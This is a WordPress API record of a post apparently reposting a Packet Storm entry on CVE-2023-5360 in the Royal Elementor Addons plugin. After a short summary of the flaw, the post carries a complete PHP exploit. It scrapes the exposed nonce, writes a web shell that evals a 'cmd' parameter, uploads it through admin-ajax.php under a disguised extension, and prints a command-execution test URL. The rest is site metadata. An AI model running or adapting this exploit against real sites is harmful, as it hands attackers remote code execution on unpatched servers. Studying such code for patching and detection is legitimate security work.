{"id":39474,"date":"2026-02-06T13:53:18","date_gmt":"2026-02-06T13:53:18","guid":{"rendered":"http:\/\/localhost\/?p=39474"},"modified":"2026-02-06T13:53:18","modified_gmt":"2026-02-06T13:53:18","slug":"wordpress-royal-elementor-addons-1378-shell-upload","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=39474","title":{"rendered":"\ud83d\udcc4 WordPress Royal Elementor Addons 1.3.78 Shell Upload_PACKETSTORM:215088"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-06T18:45:16&#8243;,&#8221;description&#8221;:&#8221;WordPress Royal Elementor Addons plugin version 1.3.78 remote shell upload proof of concept exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-06T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-06T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 WordPress Royal Elementor Addons 1.3.78 Shell Upload&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215088&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-5360&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : WordPress Royal Elementor Addons 1.3.78 RCE                                                                                 |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/downloads.wordpress.org\/plugin\/royal-elementor-addons.1.3.78.zip                                                    |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/190313\/ \\u0026 CVE-2023-5360\\n    \\n    [+] Summary \\n    \\n    a security weakness in the Royal Elementor \\n    Addons plugin for WordPress related to improper validation of file \\n    upload requests and the exposure of a client-side nonce in the global \\n    JavaScript variable \\&#8221;WprConfig\\&#8221;.\\n    \\n    The plugin registers an AJAX action used for uploading files associated \\n    with various UI elements. The weakness lies in:\\n    \\n    1. Exposure of a file upload nonce inside the website\u2019s HTML, accessible \\n       without authentication.\\n    \\n    2. Incomplete server-side validation of file type and file origin.\\n    \\n    3. Lack of authentication around the upload endpoint, which allows \\n       unauthorized requests to reach the handler.\\n    \\n    Theoretical attack sequence (documented for awareness):\\n    \\n     &#8211; Step 1: Attacker retrieves page HTML.\\n     &#8211; Step 2: Extracts nonce from `var WprConfig = {&#8230;}`.\\n     &#8211; Step 3: Sends crafted POST request to admin-ajax.php.\\n     &#8211; Step 4: Server incorrectly processes upload without capability checks.\\n     \\n    [+] poc  : \\n    \\n    usage : php poc.php http:\/\/target\/ [shell_file]\\n    \\n    \\n    \\u003c?php\\n    \/* ========================================================================\\n       Royal Elementor Addons \\u003c= 1.3.78 \u2013 Full RCE Chain (PHP Version)\\n       Compatible: Windows \/ Linux \/ macOS\\n       Requirements: CURL only (allowed in your environment)\\n       No disabled \/ forbidden functions used\\n    =========================================================================*\/\\n    \\n    \/* &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n       SAFE HTTP GET (CURL)\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;*\/\\n    function safe_http_get($url) {\\n        $ch = curl_init();\\n        curl_setopt_array($ch, [\\n            CURLOPT_URL            =\\u003e $url,\\n            CURLOPT_RETURNTRANSFER =\\u003e true,\\n            CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n            CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n            CURLOPT_FOLLOWLOCATION =\\u003e true,\\n            CURLOPT_TIMEOUT        =\\u003e 10\\n        ]);\\n        $resp = curl_exec($ch);\\n        curl_close($ch);\\n        return $resp;\\n    }\\n    \\n    \/* &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n       Extract nonce from: var WprConfig = {&#8230;};\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;*\/\\n    function get_nonce_from_target($target) {\\n        $html = safe_http_get($target);\\n        if (!$html) return null;\\n    \\n        if (preg_match(&#8216;\/var\\\\s+WprConfig\\\\s*=\\\\s*({.*?});\/s&#8217;, $html, $match)) {\\n            $json = json_decode($match[1], true);\\n            return $json[\\&#8221;nonce\\&#8221;] ?? null;\\n        }\\n    \\n        return null;\\n    }\\n    \\n    \/* &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n       Generate Safe Default RCE Shell (Temp File)\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;*\/\\n    function generate_indoushka_shell() {\\n        $path = sys_get_temp_dir() . DIRECTORY_SEPARATOR . \\&#8221;indoushka_shell_\\&#8221; . uniqid() . \\&#8221;.php\\&#8221;;\\n    \\n        $payload  = &#8216;\\u003c?php echo \\&#8221;Indoushka RCE &#8211; \\&#8221;;&#8217;;\\n        $payload .= &#8216;if(isset($_GET[\\&#8221;cmd\\&#8221;])) { @eval($_GET[\\&#8221;cmd\\&#8221;]); } ?\\u003e&#8217;;\\n    \\n        file_put_contents($path, $payload);\\n        return $path;\\n    }\\n    \\n    \/* &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n       Upload PHP File using AJAX (ph_p mutated extension)\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;*\/\\n    function indoushka_upload_shell($target, $nonce, $file_path) {\\n    \\n        $ajax = rtrim($target, \\&#8221;\/\\&#8221;) . \\&#8221;\/wp-admin\/admin-ajax.php\\&#8221;;\\n    \\n        $fields = [\\n            \\&#8221;action\\&#8221;             =\\u003e \\&#8221;wpr_addons_indoushka_file\\&#8221;,\\n            \\&#8221;max_file_size\\&#8221;      =\\u003e 0,\\n            \\&#8221;allowed_file_types\\&#8221; =\\u003e \\&#8221;ph_p\\&#8221;,\\n            \\&#8221;triggering_event\\&#8221;   =\\u003e \\&#8221;click\\&#8221;,\\n            \\&#8221;wpr_addons_nonce\\&#8221;   =\\u003e $nonce\\n        ];\\n    \\n        $file = [\\n            \\&#8221;indoushkaed_file\\&#8221; =\\u003e curl_file_create(\\n                $file_path,\\n                \\&#8221;application\/octet-stream\\&#8221;,\\n                \\&#8221;rce_mutated.ph_p\\&#8221;\\n            )\\n        ];\\n    \\n        $ch = curl_init();\\n        curl_setopt_array($ch, [\\n            CURLOPT_URL            =\\u003e $ajax,\\n            CURLOPT_POST           =\\u003e true,\\n            CURLOPT_POSTFIELDS     =\\u003e array_merge($fields, $file),\\n            CURLOPT_RETURNTRANSFER =\\u003e true,\\n            CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n            CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n        ]);\\n    \\n        $resp = curl_exec($ch);\\n        curl_close($ch);\\n    \\n        $json = json_decode($resp, true);\\n        return $json[\\&#8221;data\\&#8221;][\\&#8221;url\\&#8221;] ?? null;\\n    }\\n    \\n    \/* &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n       MAIN EXECUTION\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;*\/\\n    if ($argc \\u003c 2) {\\n        echo \\&#8221;Usage:\\\\n php \\&#8221; . $argv[0] . \\&#8221; http:\/\/target.com\/ [shell.php]\\\\n\\&#8221;;\\n        exit;\\n    }\\n    \\n    $target       = $argv[1];\\n    $custom_shell = $argv[2] ?? null;\\n    \\n    echo \\&#8221;=== Royal Elementor Addons Full RCE PoC ===\\\\n\\&#8221;;\\n    echo \\&#8221;[*] Extracting nonce from homepage&#8230;\\\\n\\&#8221;;\\n    \\n    $nonce = get_nonce_from_target($target);\\n    if (!$nonce) {\\n        echo \\&#8221;[-] Failed to extract nonce. Target may be patched.\\\\n\\&#8221;;\\n        exit;\\n    }\\n    \\n    echo \\&#8221;[+] Nonce found: $nonce\\\\n\\&#8221;;\\n    \\n    \/* Shell Selection *\/\\n    if ($custom_shell) {\\n        echo \\&#8221;[*] Using provided shell: $custom_shell\\\\n\\&#8221;;\\n        $shell = $custom_shell;\\n    } else {\\n        echo \\&#8221;[*] Generating default Indoushka RCE shell&#8230;\\\\n\\&#8221;;\\n        $shell = generate_indoushka_shell();\\n        echo \\&#8221;[+] Shell saved at: $shell\\\\n\\&#8221;;\\n    }\\n    \\n    echo \\&#8221;[*] Uploading shell via vulnerable AJAX handler&#8230;\\\\n\\&#8221;;\\n    \\n    $url = indoushka_upload_shell($target, $nonce, $shell);\\n    \\n    if ($url) {\\n        echo \\&#8221;[+] Shell uploaded successfully!\\\\n\\&#8221;;\\n        echo \\&#8221;[+] URL: $url\\\\n\\&#8221;;\\n        echo \\&#8221;[\\u003e] Test: {$url}?cmd=system(&#8216;id&#8217;);\\\\n\\&#8221;;\\n    } else {\\n        echo \\&#8221;[-] Upload failed. Target may be protected or patched.\\\\n\\&#8221;;\\n    }\\n    \\n    echo \\&#8221;Payload Variant: \\&#8221; . base64_encode(\\&#8221;ALT-FINAL-\\&#8221; . microtime(true)) . \\&#8221;\\\\n\\&#8221;;\\n    ?\\u003e\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/215088&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/215088\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-06T18:45:16&#8243;,&#8221;description&#8221;:&#8221;WordPress Royal Elementor Addons plugin version 1.3.78 remote shell upload proof of concept exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-06T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-06T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 WordPress Royal Elementor Addons 1.3.78 Shell Upload&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215088&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-5360&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n | # Title :&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-39474","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 WordPress Royal Elementor Addons 1.3.78 Shell Upload_PACKETSTORM:215088 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=39474\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 WordPress Royal Elementor Addons 1.3.78 Shell Upload_PACKETSTORM:215088 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-06T18:45:16&#8243;,&#8221;description&#8221;:&#8221;WordPress Royal Elementor Addons plugin version 1.3.78 remote shell upload proof of concept exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-06T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-06T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 WordPress Royal Elementor Addons 1.3.78 Shell Upload&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215088&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-5360&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title :...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=39474\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-06T13:53:18+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39474#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39474\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 WordPress Royal Elementor Addons 1.3.78 Shell Upload_PACKETSTORM:215088\",\"datePublished\":\"2026-02-06T13:53:18+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39474\"},\"wordCount\":971,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39474#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39474\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39474\",\"name\":\"\ud83d\udcc4 WordPress Royal Elementor Addons 1.3.78 Shell Upload_PACKETSTORM:215088 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-06T13:53:18+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39474#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39474\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39474#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 WordPress Royal Elementor Addons 1.3.78 Shell Upload_PACKETSTORM:215088\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 WordPress Royal Elementor Addons 1.3.78 Shell Upload_PACKETSTORM:215088 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=39474","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 WordPress Royal Elementor Addons 1.3.78 Shell Upload_PACKETSTORM:215088 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-06T18:45:16&#8243;,&#8221;description&#8221;:&#8221;WordPress Royal Elementor Addons plugin version 1.3.78 remote shell upload proof of concept exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-06T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-06T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 WordPress Royal Elementor Addons 1.3.78 Shell Upload&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215088&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-5360&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title :...","og_url":"https:\/\/zero.redgem.net\/?p=39474","og_site_name":"zero redgem","article_published_time":"2026-02-06T13:53:18+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=39474#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=39474"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 WordPress Royal Elementor Addons 1.3.78 Shell Upload_PACKETSTORM:215088","datePublished":"2026-02-06T13:53:18+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=39474"},"wordCount":971,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=39474#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=39474","url":"https:\/\/zero.redgem.net\/?p=39474","name":"\ud83d\udcc4 WordPress Royal Elementor Addons 1.3.78 Shell Upload_PACKETSTORM:215088 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-06T13:53:18+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=39474#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=39474"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=39474#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 WordPress Royal Elementor Addons 1.3.78 Shell Upload_PACKETSTORM:215088"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39474","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=39474"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39474\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=39474"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=39474"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=39474"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}